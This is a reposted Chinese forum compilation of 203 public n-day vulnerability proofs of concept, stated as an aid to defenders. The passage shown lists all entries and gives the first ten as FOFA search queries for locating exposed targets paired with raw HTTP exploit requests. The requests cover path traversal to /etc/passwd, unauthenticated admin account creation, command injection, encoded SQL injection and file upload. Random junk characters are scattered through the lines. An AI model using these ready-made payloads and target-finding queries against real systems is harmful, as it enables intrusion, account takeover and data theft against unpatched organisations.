中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-2024064 w$ |9 X) z0 J) E
道一安全 2024-06-05 07:41 北京" l* U  x, r2 t( p$ p3 T
以下文章来源于网络安全新视界 ,作者网络安全新视界
8 q8 k9 R# P& J. H0 z9 e; S& A, K" F0 b% \- b' C& s0 X  M' j
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
. [1 `9 p( f% p, w. R/ ^3 |, C8 k1 |, g1 w& o3 M3 _/ ]
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。) Y1 q. n& k+ m4 m8 e( y' p! i
4 k9 ~  W. s8 B
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。# U' g4 }& l% t6 c# o
3 p% {7 z6 m- d7 a9 ]' r
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
4 Z* U8 p3 a+ h. b! {7 I1 h; g9 A( J
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。, E1 C9 _& O, f$ t
7 F( X( l/ ^9 [1 d
7 R' k* s$ y: {2 w% e' k
声明
6 [. R/ X, y0 w% d) z* J- S. q8 r0 R4 Y4 y
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。) B& t' T9 w. N

3 y) h) L0 l3 P: Q" F% |; W$ U有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。! y3 Z+ z/ z5 E. A+ s; b3 C  e
4 s) C2 E' q3 g6 E
- k; s; n9 j. S) ^% L. k( c( w
- y8 Q  i/ B8 S1 }4 d  X, p
目录) m7 p: e/ l6 E9 j4 E

1 r7 }5 D8 z9 S: p: J01
+ m1 t$ b3 L$ z% e( K
* m$ l  W; z9 t3 i: w2 b1. StarRocks MPP数据库未授权访问2 |# p/ j% P: ?( [
2. Casdoor系统static任意文件读取: i# s3 ~% Q( b. S2 f/ \. \
3. EasyCVR智能边缘网关 userlist 信息泄漏0 `; u2 H3 B8 X: I' K
4. EasyCVR视频管理平台存在任意用户添加- N1 N4 l! j1 r5 s# H
5. NUUO NVR 视频存储管理设备远程命令执行
) j( @2 K. S1 G. }+ f6. 深信服 NGAF 任意文件读取- ?: S5 x4 ^# M0 ]4 f
7. 鸿运主动安全监控云平台任意文件下载5 Z, g$ C; |1 _% r
8. 斐讯 Phicomm 路由器RCE  l- w" r- @# E$ I
9. 稻壳CMS keyword 未授权SQL注入) M1 o/ N( t8 m" o7 N7 B3 e
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
2 ]$ s/ Y4 Z4 t/ p- K11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入# @5 [; W- i; x# l: G5 |5 M
12. Jorani < 1.0.2 远程命令执行" H2 j( [1 \( c4 q+ a
13. 红帆iOffice ioFileDown任意文件读取4 Y8 P8 r2 h$ @8 h8 Z3 j' |  W5 }
14. 华夏ERP(jshERP)敏感信息泄露+ d1 r( S4 F2 R4 [  w) Y
15. 华夏ERP getAllList信息泄露2 O9 t- R: c' B
16. 红帆HFOffice医微云SQL注入5 z& J  ^2 w) z& S# H+ H( \
17. 大华 DSS itcBulletin SQL 注入
# J4 N) V; ~8 [18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
/ }: p2 x% h, o19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
, Z3 {0 {* L: j: r20. 大华ICC智能物联综合管理平台任意文件读取
6 o* t% N& D, p2 `! M5 w& q21. 大华ICC智能物联综合管理平台random远程代码执行; L" f2 e- J# `) o& j
22. 大华ICC智能物联综合管理平台 log4j远程代码执行- v5 |6 n0 e8 \6 }* I+ d8 L0 T
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
6 P' ], e! H  H24. 用友NC 6.5 accept.jsp任意文件上传7 f9 t! a! r0 F  A, t* }/ k
25. 用友NC registerServlet JNDI 远程代码执行
6 O/ m$ \: e) V7 R  W$ m9 A3 u26. 用友NC linkVoucher SQL注入+ `% C( i, S# g$ z( Q) [9 U
27. 用友 NC showcontent SQL注入4 ?. ]' y$ l2 D" Z- r
28. 用友NC grouptemplet 任意文件上传% s% e2 v/ c6 P6 R) {4 j1 m. }
29. 用友NC down/bill SQL注入
5 n/ ~% |. |* l8 S8 Z9 G, H30. 用友NC importPml SQL注入) ~2 q% @1 ?, X9 c: F
31. 用友NC runStateServlet SQL注入
" q4 ~- [& |' Y3 l9 j' v32. 用友NC complainbilldetail SQL注入
) C1 H# v6 l8 j1 I* r1 ^  C4 W33. 用友NC downTax/download SQL注入. K2 M# b! F8 V3 V! v. ?
34. 用友NC warningDetailInfo接口SQL注入, D" D6 t& F  ]/ \5 |* H! I
35. 用友NC-Cloud importhttpscer任意文件上传' ^- K' o! M4 B/ {( W6 I8 p3 E
36. 用友NC-Cloud soapFormat XXE
3 G& x) U5 p/ k, g! K& G% {8 V. i, l37. 用友NC-Cloud IUpdateService XXE5 M8 V, K" j' @" Q. c6 T4 y3 ^
38. 用友U8 Cloud smartweb2.RPC.d XXE. f3 g3 m8 f& h' S7 A( a. E9 a, h1 ]
39. 用友U8 Cloud RegisterServlet SQL注入" M( V( @+ z4 B/ d6 q
40. 用友U8-Cloud XChangeServlet XXE4 v! l$ I6 E, i0 `
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入' P0 G' ^3 b, X# r7 x! l0 L4 L3 d: T) _
42. 用友GRP-U8 SmartUpload01 文件上传
1 O7 E- q8 T+ N: {0 Q# Q+ d- k: k: ~& Z43. 用友GRP-U8 userInfoWeb SQL注入致RCE% x! n8 o6 d9 U# J& e% V. n
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
' V  s, n( U  N" M45. 用友GRP-U8 ufgovbank XXE
! }5 U' o8 m1 O6 [1 _6 b+ f) T% W- V46. 用友GRP-U8 sqcxIndex.jsp SQL注入
9 l- M( b8 }: x, q7 @9 o- Q1 V47. 用友GRP A++Cloud 政府财务云 任意文件读取
" K+ N' S0 J( S: I% C48. 用友U8 CRM swfupload 任意文件上传8 O) U5 q  B/ a9 H% A
49. 用友U8 CRM系统uploadfile.php接口任意文件上传& A7 K- p8 ^. ?  ~) s8 D
50. QDocs Smart School 6.4.1 filterRecords SQL注入
5 ?+ u: f* V& N51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% e5 y' C4 Y! Q! _
52. 泛微E-Office json_common.php sql注入
+ l  M1 Y; V/ I. @; w5 f& F5 ]53. 迪普 DPTech VPN Service 任意文件上传8 X0 y% `, m: ^6 \/ f+ [3 a" e/ C
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
; @4 z: ~; N$ S3 E6 q0 X3 W0 |0 P55. 畅捷通T+ getdecallusers信息泄露
% S, s1 x  h9 \2 ]; e9 w5 @  ^4 d56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE! o; ~& _" E) [/ l: R; Y
57. 畅捷通T+ keyEdit.aspx SQL注入
; E7 I0 c3 L6 X5 b9 y7 u58. 畅捷通T+ KeyInfoList.aspx sql注入
5 f/ @3 S. H  i  i! l59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
6 J( Y: h) R% e( W! i6 a  A4 Y7 t60. 百卓Smart管理平台 importexport.php SQL注入& l8 X8 ^/ Y. M( G9 z* b
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传. P, D0 i! x& ?4 \- \( F
62. IP-guard WebServer 远程命令执行
# ?+ }) j# t; G# g7 N63. IP-guard WebServer任意文件读取
, C  l4 A1 Y9 L7 }( L9 ]0 |! B# @2 A64. 捷诚管理信息系统CWSFinanceCommon SQL注入
& o+ X% p: Z2 E9 x; u, r- ]65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
7 |1 z, |8 o) g3 m66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
! N! ^+ u3 b) Z) _& q( @* G67. 万户ezOFFICE wpsservlet任意文件上传. D; r5 L) E6 N) c9 ]
68. 万户ezOFFICE wf_printnum.jsp SQL注入0 R. f; f, @9 V; u
69. 万户 ezOFFICE contract_gd.jsp SQL注入) h: ~3 T# U/ v
70. 万户ezEIP success 命令执行( C; d% K! N- T- n
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入9 u! F! s: f! o6 c
72. 致远OA getAjaxDataServlet XXE9 S- P! H% D" ~: u7 {" K- z9 C: H! C
73. GeoServer wms远程代码执行
9 S0 p& `" ^4 H  N* P  i74. 致远M3-server 6_1sp1 反序列化RCE2 b0 J& \3 f; E
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
6 G6 J" o7 A6 [; T% e, G* M76. 新开普掌上校园服务管理平台service.action远程命令执行0 |3 B9 P8 T6 Y1 l
77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ d3 v, T' `5 U) }; @2 u0 ^9 }/ ?2 E0 g
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) V- ^# |( x: s2 N) a
79. BYTEVALUE 百为流控路由器远程命令执行5 ?  J9 V4 a- [: q7 p6 n
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
2 Y2 x1 w* D/ ^* Z81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
8 Z4 ?9 R& Q: b& x0 v1 T0 R82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行9 [% z$ O1 n! r* O* d- u" R  |
83. JeecgBoot testConnection 远程命令执行! t# v6 k1 p! i- y  V- @; h
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
; {& @! Y1 m. @: N. Y85. SysAid On-premise< 23.3.36远程代码执行2 }' W! f2 g6 k$ L+ E8 k' s
86. 日本tosei自助洗衣机RCE9 T. l9 Z5 X5 i7 }9 T
87. 安恒明御安全网关aaa_local_web_preview文件上传
" B4 z% T7 D$ s& `  b6 y) w88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
) r2 v7 Y5 |0 ?( q; x89. 致远互联FE协作办公平台editflow_manager存在sql注入# X) `0 |* Q8 U6 e
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
2 R' G$ s! Y0 M% g# c91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
, d$ }: Q" j2 @+ `/ v! {8 r# y92. 海康威视运行管理中心session命令执行
& D) C: S6 W6 i0 k- X5 u" [4 M93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传3 T$ h' M  n' J2 s" D( E
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传; e# Y- e; V5 ]- e) s+ J
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行6 y/ T% \7 F+ `$ O8 F9 E  d
96. Apache OFBiz  18.12.11 groovy 远程代码执行% h4 c. v) C" Z0 K
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 A) S6 j* ^9 p3 E98. SpiderFlow爬虫平台远程命令执行  o) s5 M8 Z3 ^( u' R% \' [% x
99. Ncast盈可视高清智能录播系统busiFacade RCE
" e) a8 d' |2 Z1 P100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 E+ t. ]6 J( P5 E" L* E3 c101. ivanti policy secure-22.6命令注入, b( J7 r( r5 \& g; i$ e6 n
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
2 V* J. ^8 X% u/ f8 d- O7 v103. Ivanti Pulse Connect Secure VPN XXE
0 C2 e/ N2 t! F2 ~104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露3 r1 H! z' u" Y; \- Z
105. SpringBlade v3.2.0 export-user SQL 注入
- p% C: g, x+ I% d2 g4 s106. SpringBlade dict-biz/list SQL 注入
9 L0 Q4 b/ c0 p% u" K107. SpringBlade tenant/list SQL 注入
% I+ f" e4 y' R$ G5 E9 e108. D-Tale 3.9.0 SSRF
, d# q+ m9 D  @+ i2 ]6 H109. Jenkins CLI 任意文件读取
' `5 Q5 ]6 ?, G4 {, F+ U110. Goanywhere MFT 未授权创建管理员1 c- j1 j* J  C
111. WordPress Plugin HTML5 Video Player SQL注入% g. A9 o1 p$ m1 M8 f3 c. J
112. WordPress Plugin NotificationX SQL 注入; ]' e6 B2 Z; z) R+ z' U
113. WordPress Automatic 插件任意文件下载和SSRF) I: B; H  S( b5 B
114. WordPress MasterStudy LMS插件 SQL注入
' N/ p' S5 @- @; Q8 Y- [+ O( Q. ?7 D115. WordPress Bricks Builder <= 1.9.6 RCE
( n" E5 z, [3 b2 w9 u4 |: V7 F116. wordpress js-support-ticket文件上传
) e+ @* L2 F8 U" y1 z0 {117. WordPress LayerSlider插件SQL注入* p$ z" n4 S. Z  r4 k( g
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传  e: W" ^3 I% _. U+ }1 w
119. 北京百绰智能S20后台sysmanageajax.php sql注入) }& V# V5 [4 u0 I0 k( S1 X
120. 北京百绰智能S40管理平台导入web.php任意文件上传% _7 R+ F% x* P( m* _! _% K
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
5 e9 i! n0 `  D7 V- j$ S122. 北京百绰智能s200管理平台/importexport.php sql注入% y( E6 w" n* `2 ~
123. Atlassian Confluence 模板注入代码执行! I. w* o1 \8 p1 e$ @7 |" F' w
124. 湖南建研工程质量检测系统任意文件上传" Z6 \. g& _* x- E, |$ ~  ]! M
125. ConnectWise ScreenConnect身份验证绕过
: r9 Y& `7 c2 b126. Aiohttp 路径遍历
! `! y! z! D4 i; R& i6 x" X127. 广联达Linkworks DataExchange.ashx XXE
, k6 }! {3 E# y3 ]128. Adobe ColdFusion 反序列化% V* P$ ]9 }- n; E
129. Adobe ColdFusion 任意文件读取9 T& x! b; u# c( u& C7 c
130. Laykefu客服系统任意文件上传0 t7 N' L1 z- M4 s
131. Mini-Tmall <=20231017 SQL注入
% e: }' \+ Y- M, }3 a132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过7 [; z( B% g5 f  ]* z7 j" P
133. H5 云商城 file.php 文件上传
/ }3 z- ^( z: T* G  M# j! F: b' m134. 网康NS-ASG应用安全网关index.php sql注入! B8 T0 G7 J4 ~% c  {, Z4 B
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入: ^/ r5 E0 c: K' f# {: f# G+ Q
136. NextChat cors SSRF. w6 g% A3 k) E! X( ?
137. 福建科立迅通信指挥调度平台down_file.php sql注入
. x3 r5 h+ f" ?: H! @2 E138. 福建科立讯通信指挥调度平台pwd_update.php sql注入4 q/ C& a- b. c; Z4 o
139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ W( n$ D! N# v" Q
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入$ V# x& [6 z5 }% O# L% b
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入, O0 J# l" F0 m( [: i: X
142. CMSV6车辆监控平台系统中存在弱密码0 T9 F1 W: `, t2 s
143. Netis WF2780 v2.1.40144 远程命令执行
9 w/ I: v+ ]. @  Y  [0 X; e& Y! r144. D-Link nas_sharing.cgi 命令注入
/ |( ?! D) V* R) n. ^: `) t145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
1 ~, {) Z6 F- ?4 V+ V1 G/ w# `146. MajorDoMo thumb.php 未授权远程代码执行9 r9 |* d. ~: i# T
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历5 ]4 N6 N3 e1 O: i2 W% M
148. CrushFTP 认证绕过模板注入
7 ^: b* p, d% o9 @' ]149. AJ-Report开源数据大屏存在远程命令执行
' G6 z- x8 e. t4 }1 N150. AJ-Report 1.4.0 认证绕过与远程代码执行6 y9 ^6 J: ~9 M- v6 H: s
151. AJ-Report 1.4.1 pageList sql注入! w& n; o# Y" ^2 {) _  {; G
152. Progress Kemp LoadMaster 远程命令执行
4 p4 h& F4 m; T$ m' h153. gradio任意文件读取
9 a6 P) N' Q4 c  m: m9 O154. 天维尔消防救援作战调度平台 SQL注入0 c; f, Z* Z* J8 T$ N# S. z
155. 六零导航页 file.php 任意文件上传& {1 x3 Z& d* C  P8 Y6 u+ W9 I; S
156. TBK DVR-4104/DVR-4216 操作系统命令注入
& L9 N6 N  Q0 k1 J157. 美特CRM upload.jsp 任意文件上传
! \9 e. S& v+ z2 {, t- `, K2 {158. Mura-CMS-processAsyncObject存在SQL注入6 x' C$ z9 ~: R" N0 Z2 w
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传$ u5 L1 d  z% }% N1 X7 k( b2 I2 r
160. Sonatype Nexus Repository 3目录遍历与文件读取6 k3 c% {* r1 S4 f! A' u
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传3 i. a. H, a! G& K; z' U4 m
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传5 z8 a6 H) X8 i6 `
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
  I& t( t" p; |164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传+ P/ \4 N; a- t7 M) M; h5 z
165. OrangeHRM 3.3.3 SQL 注入
4 N3 T' t; l/ ?' a& X$ z7 Y# L166. 中成科信票务管理平台SeatMapHandler SQL注入
' D  _: o5 a6 W6 o167. 精益价值管理系统 DownLoad.aspx任意文件读取
- p; m  @) k, _; h; L168. 宏景EHR OutputCode 任意文件读取8 q+ N4 H- B3 E9 c& d' i: W( R
169. 宏景EHR downlawbase SQL注入
/ G, L4 H0 U: y  }- @170. 宏景EHR DisplayExcelCustomReport 任意文件读取; b+ T  e; T8 Q2 ]$ @5 f, X
171. 通天星CMSV6车载定位监控平台 SQL注入
  [# w1 Q* B+ I. e8 R2 f172. DT-高清车牌识别摄像机任意文件读取
% u" v. F* l- S; ?( N) l7 \173. Check Point 安全网关任意文件读取( t" d. g2 s2 x% g
174. 金和OA C6 FileDownLoad.aspx 任意文件读取8 k& P* R' {: j- Z
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入, p% h# o! Q% K0 V5 L
176. 电信网关配置管理系统 rewrite.php 文件上传
2 ^* e+ I3 \$ H4 C  f177. H3C路由器敏感信息泄露
% `% Z6 f5 {" n6 N178. H3C校园网自助服务系统-flexfileupload-任意文件上传
1 F5 s' h1 b$ e179. 建文工程管理系统存在任意文件读取
& M2 T/ j5 u% y180. 帮管客 CRM jiliyu SQL注入
/ E# S( }& }! Y( @4 `1 G$ v181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; h3 z, _, V/ ~  q2 R182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
( z9 \2 t, ]: w/ H, t4 |183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
3 N* I- J" f" Y- E! m" g184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ \  ~0 W2 |' x0 Z: S& u0 j, z185. 瑞友天翼应用虚拟化系统SQL注入
8 {, Y9 V6 Q4 F! H186. F-logic DataCube3 SQL注入! [. G8 y- K) c  e: q
187. Mura CMS processAsyncObject SQL注入
& p- |. H+ G7 M/ h' D$ F188. 叁体-佳会视频会议 attachment 任意文件读取
5 T, r& c# f" T; {: ~. L+ W9 I189. 蓝网科技临床浏览系统 deleteStudy SQL注入0 N$ O# p5 M, j) _* [$ K
190. 短视频矩阵营销系统 poihuoqu 任意文件读取% ]3 {8 v. K7 J' k+ c% e  F  h
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
  H. ~( R. ]# t+ Y5 R. s192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
6 y; Y) x, V) W+ A, n193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 {: Z" G9 P: q0 u1 a7 [9 |
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
& W) f! n8 m; R' j4 h1 N195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; j: Y6 g4 g( O2 i6 j- N% U
196. 河南省风速科技统一认证平台密码重置9 a# Q" a# ], i$ d' [' A
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
- e, |. ?; U0 @6 s4 B# G7 l198.  阿里云盘 WebDAV 命令注入8 ^+ ~5 N2 ?% [" G6 j, `( w- Q
199. cockpit系统assetsmanager_upload接口 文件上传- |. k4 }+ h" X) _# ]- o" r
200. SeaCMS海洋影视管理系统dmku SQL注入2 U) t0 O- c" |+ d4 x8 v
201. 方正全媒体新闻采编系统 binary SQL注入
# x1 P8 X8 Z, f202. 微擎系统 AccountEdit任意文件上传# g. E( K8 {/ w7 V- i/ E$ P
203. 红海云EHR PtFjk 文件上传1 U$ z6 C  S' }/ z- w

) v% D2 Z. @- i4 U# n7 Z6 uPOC列表
  W) z' Q. i  F) f+ C; C' B
: O! Z+ t& O+ y4 S, ?02( E, U5 U; u' f0 |  A7 r! b- n

. E) b: e) U+ p5 d% E1. StarRocks MPP数据库未授权访问
, N# e1 _! j  P+ [0 [; oFOFA :title="StarRocks"6 `5 w$ L7 M& D
GET /mem_tracker HTTP/1.1
3 ?8 I; c" a, qHost: URL9 Y/ g$ m+ n9 }2 t; O4 h

. h1 t% s+ d5 R) m7 v4 Y' f* _' V8 O* Z9 X
2. Casdoor系统static任意文件读取
$ h. ~! [7 x8 G% rFOFA :title="Casdoor"
2 ~$ V; K) L/ ?/ d7 D8 K( m+ I; JGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
: n" N) Y, r1 L; iHost: xx.xx.xx.xx:9999
# |# x/ ?* k: aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 h) r" q+ b- {% `+ p) S
Connection: close$ v* t& [% `) Z) @8 n: O
Accept: */*% t$ P+ i- Y: F* d/ ]4 ~$ r7 j. d1 ~
Accept-Language: en
* f7 k) V$ g2 J/ P) {) c( C+ w) ~, iAccept-Encoding: gzip' e7 L, P2 z& ~8 e; d1 `" Q8 N

' K- Y' U% a' t- }1 L2 Q& u  ?4 j2 g4 G; e4 ~$ X, {
3. EasyCVR智能边缘网关 userlist 信息泄漏& x, T' G( h# t0 A. Y
FOFA :title="EasyCVR"$ h/ \" J- B( a6 K
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1( ~  r5 U& K! z+ w
Host: xx.xx.xx.xx
' {9 E3 L$ }' C$ C! y3 C. P" E6 O6 c. ]+ m+ a5 `+ ]; h' k4 u
2 t1 r0 g4 {4 p) S1 D
4. EasyCVR视频管理平台存在任意用户添加
3 x) B, Z: T9 H8 F0 x' I& `FOFA :title="EasyCVR"  e4 {3 u2 \5 x

2 ?' Y, h) k/ T! u1 E+ l! ?0 Hpassword更改为自己的密码md5* v, ^9 N( A, |2 i$ Q
POST /api/v1/adduser HTTP/1.1
& f: a# ^0 F* U3 wHost: your-ip% q8 W9 L; u& S* l
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
( w8 w) |3 u: a1 a+ v8 p0 F% ?* Y& m& k* X) H1 _
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
) R5 j$ \3 i4 B+ ]* d/ p! O4 Q- \& v9 E6 p3 [' Y8 S
* S) U, k* Y- ]- J
5. NUUO NVR 视频存储管理设备远程命令执行
$ X. w+ b! J( l) f7 }FOFA:title="Network Video Recorder Login"
6 S) G; H, |) A- @& AGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
' F& F+ N( Q4 o! l4 o! OHost: xx.xx.xx.xx
( g) K; d' s* x7 q. @+ V& O3 u! w5 P( {  p

/ [# F- }) i' O9 B8 Z" Q- x- K6. 深信服 NGAF 任意文件读取$ d  j1 H8 D" D, v9 k" l1 w7 `
FOFA:title="SANGFOR | NGAF"
' G8 W+ y5 E: j1 w$ K# c9 v5 MGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1+ Z8 p/ ?: B* _% L1 u4 F) t; M
Host:1 A3 p) o' {6 j  Y$ e' C. t. n

: l- O) N$ w* q$ o5 c& k9 Z5 L* K7 i
7. 鸿运主动安全监控云平台任意文件下载
5 {; [& }1 S# C: [FOFA:body="./open/webApi.html"
1 L0 i7 v1 q7 c8 C6 D1 ^GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.11 U/ m: w' v) J/ R, V
Host:) r' F# V# D; t" ~9 s
+ J7 n  ]5 k8 w: O$ G: V9 ^
, @  K7 N% G8 W) Y# f1 X
8. 斐讯 Phicomm 路由器RCE1 }# W2 ^6 }) y
FOFA:icon_hash="-1344736688", Z+ `" v' [( h' g, q
默认账号admin登录后台后,执行操作) ?, k7 S/ `/ v" ]; t& Y; h
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
' ^: o0 r; a1 L  J1 f6 N" [Host: x.x.x.x8 z( ]5 }  h! o' ~, ?/ M3 [3 \
Cookie: sysauth=第一步登录获取的cookie
, f5 I" q, v* |. t8 A' ], _* G; xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
" d. ~6 I4 K+ n* p9 x8 Z3 [" {User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# ?; T) l6 @. k% ?4 S2 ]+ [
# a4 N/ Z9 m# s5 [% z5 z" f3 f------WebKitFormBoundaryxbgjoytz5 |* \; S' |- g
Content-Disposition: form-data; name="wifiRebootEnablestatus"
0 m5 [0 i% D5 w4 J
# z; G& Y  A: T8 s& I. H" u* b%s. X4 i% ?) w7 |4 O0 l9 v
------WebKitFormBoundaryxbgjoytz
0 X+ P7 m0 R! J( kContent-Disposition: form-data; name="wifiRebootrange": z. F, h# R: M3 p7 F

" A6 q4 W2 G- g- Y, V  _3 y! t12:00; id;
" D& v6 p6 Z; E" S7 y4 I, r) b$ H------WebKitFormBoundaryxbgjoytz
! h9 Y2 {: P3 wContent-Disposition: form-data; name="wifiRebootendrange"
+ k' ^; S+ Z0 N0 X: F+ p- A$ N$ R2 z3 @% |# q& {: f
%s:
+ e6 R& T4 f% c* B: b- a/ {------WebKitFormBoundaryxbgjoytz
7 m' e* k3 B- GContent-Disposition: form-data; name="cururl2"9 z* j+ S- N; P  W+ m, B

# [( H# e9 V. Z8 A2 |) m; I1 ]4 m
; b* @( ^9 M1 s" V5 U------WebKitFormBoundaryxbgjoytz--
# P" J" c6 z* @' G$ p5 z+ K5 j" j2 [  m+ G8 q! p

! ?$ k( _! y; m3 X2 K) I/ t( _9. 稻壳CMS keyword 未授权SQL注入" C7 A8 ]* s: b. [2 h( h
FOFA:app="Doccms"
" N4 [) o% p' `GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
; _# w$ q: E( E2 _% B3 yHost: x.x.x.x# L$ u! \% b: F+ d6 t6 r. C

  f8 [0 j6 V! k' P; E) G3 `) V! J0 I  o: |
payload为下列语句的二次Url编码; I9 _4 u4 F, [

, E; Q( e) T9 T4 ~6 `' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#3 |" \& e! z+ `3 L) z- N6 U

! ?% g" B2 w: F10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
4 [& w' x3 _) ^7 AFOFA:icon_hash="953405444"* I+ X- u. s: R* |  u" W: j9 z: {

$ P  X4 O# A+ b7 q4 d; ~6 i文件上传后响应中包含上传文件的路径$ `2 ]3 u+ S% H" P
POST /eis/service/api.aspx?action=saveImg HTTP/1.10 z$ S3 \3 F0 l  l
Host: x.x.x.x:xx9 ^, b' ?) ^+ j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
5 y( W: V9 X3 M" C6 ?7 a" \1 xContent-Length: 197+ r& z+ U# i9 _2 W- q4 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! |1 l% d- ]% l4 Y6 e! `1 l3 HAccept-Encoding: gzip, deflate. J) c; r) z" e% T' Q2 Y; @
Accept-Language: zh-CN,zh;q=0.9
+ R. V9 J# @. _2 f0 ^Connection: close
8 c# v4 X6 m  _/ d: lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu. \5 ~; p. O0 {1 c: D' L
. {; R% y  _* ]
------WebKitFormBoundaryxdgaqmqu1 |. F4 B' w$ t; k9 n
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
* K# o( ~$ G: g4 QContent-Type: text/html' i1 a9 m! b7 Y2 R( W

* t  M) Y* j7 B* }- P2 L4 ejmnqjfdsupxgfidopeixbgsxbf# \; V3 J" j! C. A# o) {5 T+ b: }
